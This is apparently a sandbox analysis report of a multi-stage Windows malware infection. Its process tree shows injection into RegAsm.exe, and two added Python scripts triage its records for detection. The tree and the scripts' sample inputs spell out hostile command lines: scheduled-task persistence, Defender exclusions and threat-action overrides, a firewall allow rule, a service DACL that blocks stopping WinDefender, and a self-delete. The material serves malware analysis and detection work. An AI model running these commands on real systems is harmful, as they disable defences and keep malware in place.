PID 1832 wrote to memory of 2632 | 1832 | gold.exe | RegAsm.exe
PID 1832 wrote to memory of 2632 | 1832 | gold.exe | RegAsm.exe
PID 1832 wrote to memory of 2632 | 1832 | gold.exe | RegAsm.exe
PID 1832 wrote to memory of 2632 | 1832 | gold.exe | RegAsm.exe
PID 1832 wrote to memory of 2632 | 1832 | gold.exe | RegAsm.exe
PID 2068 wrote to memory of 2096 | 2068 | chrosha.exe | NewB.exe
PID 2068 wrote to memory of 2096 | 2068 | chrosha.exe | NewB.exe
PID 2068 wrote to memory of 2096 | 2068 | chrosha.exe | NewB.exe
-
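The table above lists every WriteProcessMemory call the sandbox recorded. The script below is an added example and not part of this report: it parses rows in that format, counts writes per writer/target pair, flags writes into the signed .NET utilities this sample starts with no arguments and then overwrites (the pattern behind the SetThreadContext + WriteProcessMemory signatures in the tree), and walks the chain of writers back to the Amadey loader. SAMPLE is a hand-transcribed excerpt of the table (constructed input); the LOLBINS set and the "first writer wins" lineage rule are this example's own assumptions.

```python
"""Rebuild the injection chain from a sandbox 'wrote to memory' table.

Added example, not part of the report. SAMPLE is a constructed excerpt of
the report's rows; parse_records() accepts the full table in the same
layout: "PID <src> wrote to memory of <dst> <src> <src image> <dst image>".
"""
import re
from collections import Counter, namedtuple

Record = namedtuple("Record", "src_pid src_image dst_pid dst_image")

ROW_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) (\d+) (\S+) (\S+)")

# Signed .NET utilities this sample spawns and then writes into (assumption:
# treat any write into one of these as a hollowing candidate).
LOLBINS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}

# Constructed excerpt of the report's table (repeat counts trimmed).
SAMPLE = """
PID 2068 wrote to memory of 1856 2068 chrosha.exe swiiiii.exe
PID 2068 wrote to memory of 1856 2068 chrosha.exe swiiiii.exe
PID 2068 wrote to memory of 1856 2068 chrosha.exe swiiiii.exe
PID 1856 wrote to memory of 1716 1856 swiiiii.exe RegAsm.exe
PID 1856 wrote to memory of 1716 1856 swiiiii.exe RegAsm.exe
PID 1856 wrote to memory of 1716 1856 swiiiii.exe RegAsm.exe
PID 2068 wrote to memory of 1568 2068 chrosha.exe alexxxxxxxx.exe
PID 1568 wrote to memory of 3252 1568 alexxxxxxxx.exe RegAsm.exe
PID 1568 wrote to memory of 4544 1568 alexxxxxxxx.exe RegAsm.exe
PID 1568 wrote to memory of 4544 1568 alexxxxxxxx.exe RegAsm.exe
PID 1568 wrote to memory of 4544 1568 alexxxxxxxx.exe RegAsm.exe
PID 1568 wrote to memory of 4544 1568 alexxxxxxxx.exe RegAsm.exe
PID 4544 wrote to memory of 3084 4544 RegAsm.exe trf.exe
PID 4544 wrote to memory of 3084 4544 RegAsm.exe trf.exe
PID 4544 wrote to memory of 3236 4544 RegAsm.exe keks.exe
PID 2068 wrote to memory of 2096 2068 chrosha.exe NewB.exe
"""


def parse_records(text):
    """Turn table rows into Record tuples; lines that are not rows are skipped."""
    records = []
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if not m:
            continue
        src, dst, src_again, src_img, dst_img = m.groups()
        if src != src_again:  # the pid column must repeat the writer's pid
            raise ValueError(f"inconsistent row: {line!r}")
        records.append(Record(int(src), src_img, int(dst), dst_img))
    return records


def write_counts(records):
    """Number of WriteProcessMemory events per (writer pid, target pid)."""
    return Counter((r.src_pid, r.dst_pid) for r in records)


def hollowing_candidates(records):
    """(writer pid, target pid, writer image, target image, writes) for every
    target whose image is in LOLBINS, sorted by pids."""
    images = {}
    for r in records:
        images.setdefault((r.src_pid, r.dst_pid), (r.src_image, r.dst_image))
    out = []
    for (src, dst), n in write_counts(records).items():
        src_img, dst_img = images[(src, dst)]
        if dst_img.lower() in LOLBINS:
            out.append((src, dst, src_img, dst_img, n))
    return sorted(out)


def lineage(records, pid):
    """Images from the root writer down to `pid`, following who wrote into
    whom; the first writer seen for each target wins."""
    writer, image = {}, {}
    for r in records:
        writer.setdefault(r.dst_pid, r.src_pid)
        image.setdefault(r.src_pid, r.src_image)
        image.setdefault(r.dst_pid, r.dst_image)
    path, seen = [], set()
    while pid in image and pid not in seen:
        seen.add(pid)
        path.append(image[pid])
        if pid not in writer:
            break
        pid = writer[pid]
    return path[::-1]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for src, dst, src_img, dst_img, n in hollowing_candidates(recs):
        chain = " > ".join(lineage(recs, dst))
        print(f"{src_img} ({src}) -> {dst_img} ({dst}): {n} writes; chain: {chain}")
```

Fed the full table, the same code shows what the excerpt hints at: chrosha.exe (Amadey) never injects directly; each downloaded stage hollows its own RegAsm.exe, and one of those hollowed RegAsm.exe instances (4544) in turn writes into trf.exe and keks.exe, so a detection keyed only on "parent is a known stealer" misses the second hop.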
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
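The process tree below contains the concrete schtasks, reg, PowerShell, WMIC, netsh and sc invocations behind this signature and the defense-evasion ones. As an added example that is not part of the report, the following script triages command lines of that shape: scheduled-task persistence traits (minute-interval repeat, ONLOGON, /RL HIGHEST, /RU SYSTEM, a target in a user-writable directory or a system-binary name outside its normal directory), Windows Defender ThreatIDDefaultAction writes with value 6 (Allow) and exclusion changes via Add-MpPreference or the MSFT_MpPreference WMI class, inbound firewall allow rules, the sc sdset DACL that denies Administrators SERVICE_STOP (WP) and SERVICE_PAUSE_CONTINUE (DT), and the choice-then-del self-delete. The sample command lines are transcribed from the tree (constructed input); the user-writable path markers and the list of system-binary names are this example's own choices.

```python
"""Triage persistence and defense-evasion command lines from a process tree.

Added example, not part of the sandbox report. SAMPLE_CMDLINES are transcribed
from the tree (constructed input). Assumptions: ThreatIDDefaultAction 6 = Allow;
in service SDDL, WP = SERVICE_STOP, DT = SERVICE_PAUSE_CONTINUE, BA = Builtin
Administrators; USER_WRITABLE and SYSTEM_NAMES are illustrative choices.
"""
import re

SAMPLE_CMDLINES = r"""
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 15:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSB7D2.tmp\Install.exe\" Wt /aVWdidKPsl 385118 /S" /V1 /F
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
""".strip().splitlines()

USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public)\\", re.I)
SYSTEM_NAMES = {"csrss.exe", "explorer.exe", "svchost.exe", "lsass.exe", "winlogon.exe"}
SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32"}
ACE_RE = re.compile(r"\((\w+);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")


def win_tokens(cmdline):
    """Split on whitespace, honouring double quotes and backslash-quote escapes;
    backslashes stay literal (shlex would eat them in unquoted paths)."""
    tokens, cur, in_quotes, i = [], [], False, 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == "\\" and cmdline[i + 1:i + 2] == '"':
            cur.append('"')
            i += 2
            continue
        if c == '"':
            in_quotes = not in_quotes
        elif c.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(c)
        i += 1
    if cur:
        tokens.append("".join(cur))
    return tokens


def slash_options(tokens):
    """Map each /key token to the value that follows it ('' for bare switches)."""
    opts = {}
    for i, tok in enumerate(tokens):
        if tok.startswith("/"):
            nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
            opts[tok[1:].lower()] = "" if nxt.startswith("/") else nxt
    return opts


def schtasks_findings(opts):
    """Persistence traits of a parsed 'schtasks /create' invocation."""
    f, sc = [], opts.get("sc", "").lower()
    if sc == "minute" and opts.get("mo", "1") == "1":
        f.append("repeats every minute")
    if sc == "onlogon":
        f.append("runs at logon")
    if opts.get("rl", "").lower() == "highest":
        f.append("highest run level")
    if opts.get("ru", "").lower() in ("system", "nt authority\\system"):
        f.append("runs as SYSTEM")
    target = win_tokens(opts.get("tr", ""))  # /TR may carry arguments; keep the program
    prog = target[0] if target else ""
    if USER_WRITABLE.search(prog):
        f.append("target in user-writable path")
    d, _, base = prog.lower().rpartition("\\")
    if base in SYSTEM_NAMES and d not in SYSTEM_DIRS:
        f.append(f"{base} outside its system directory")
    return f


def sddl_denied_rights(sddl, trustee):
    """Two-letter access-right codes that the DACL denies to `trustee`."""
    denied = set()
    for ace_type, _flags, mask, _obj, _inh, sid in ACE_RE.findall(sddl.split("S:", 1)[0]):
        if ace_type == "D" and sid == trustee:
            denied.update(mask[i:i + 2] for i in range(0, len(mask), 2))
    return denied


def triage(cmdline):
    """Findings for one command line; an empty list means no rule matched."""
    toks = win_tokens(cmdline)
    if not toks:
        return []
    exe, low, f = toks[0].rpartition("\\")[2].lower(), cmdline.lower(), []
    if exe in ("schtasks", "schtasks.exe") and "/create" in low:
        f += ["schtasks persistence: " + x for x in schtasks_findings(slash_options(toks[1:]))]
    m = re.search(r'threatiddefaultaction.*?/v\s+[\\"]*(\d+)[\\"]*\s+/t\s+reg_sz\s+/d\s+(\d+)', low)
    if m and m.group(2) == "6":
        f.append(f"Defender: threat {m.group(1)} default action set to Allow (6)")
    if "add-mppreference" in low and "-exclusion" in low:
        f.append("Defender: exclusion added via Add-MpPreference")
    if "msft_mppreference" in low and "call add" in low:
        f.append("Defender: exclusion added via WMI MSFT_MpPreference")
    if "advfirewall" in low and "action=allow" in low:
        prog = re.search(r'program="?([^"\s]+)', cmdline, re.I)
        f.append("Firewall: inbound allow rule for " + (prog.group(1) if prog else "?"))
    if exe in ("sc", "sc.exe") and len(toks) >= 4 and toks[1].lower() == "sdset":
        stop = sddl_denied_rights(toks[3], "BA") & {"WP", "DT"}
        if stop:
            f.append(f"Service {toks[2]}: Administrators denied {'/'.join(sorted(stop))} (stop/pause)")
    if "choice" in low and re.search(r"\bdel\b", low):
        f.append("self-delete via delayed del")
    return f


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        for finding in triage(line):
            print(f"{finding:60} <- {line[:70]}")
```

The rules are deliberately keyed on the arguments rather than on the binary name, because every one of these commands is a built-in Windows tool: what makes them worth an alert is a task that re-launches a user-profile EXE every minute, a policy value that tells Defender to allow a given threat ID, or a service DACL that strips Stop from Administrators.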
Processes
-
C:\Users\Admin\AppData\Local\Temp\d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe"C:\Users\Admin\AppData\Local\Temp\d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 8923⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 4083⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 4083⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\PIGAHxGe2PbxS5e6f1KRsKtL.exe"C:\Users\Admin\Pictures\PIGAHxGe2PbxS5e6f1KRsKtL.exe"4⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u2og.0.exe"C:\Users\Admin\AppData\Local\Temp\u2og.0.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u2og.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u2og.2\run.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\u2og.3.exe"C:\Users\Admin\AppData\Local\Temp\u2og.3.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD16⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 11645⤵
- Program crash
-
C:\Users\Admin\Pictures\c60PHerJOpPIJ0qXm2jrdNh4.exe"C:\Users\Admin\Pictures\c60PHerJOpPIJ0qXm2jrdNh4.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\c60PHerJOpPIJ0qXm2jrdNh4.exe"C:\Users\Admin\Pictures\c60PHerJOpPIJ0qXm2jrdNh4.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\4odFPgou1NdrXX1AEvintttJ.exe"C:\Users\Admin\Pictures\4odFPgou1NdrXX1AEvintttJ.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\4odFPgou1NdrXX1AEvintttJ.exe"C:\Users\Admin\Pictures\4odFPgou1NdrXX1AEvintttJ.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\vqWRXwiYTAOQ7LQpPAXyXrKb.exe"C:\Users\Admin\Pictures\vqWRXwiYTAOQ7LQpPAXyXrKb.exe"4⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\NNCOsc0vdMxEbZzlFP8211Wx.exe"C:\Users\Admin\Pictures\NNCOsc0vdMxEbZzlFP8211Wx.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSB7D2.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
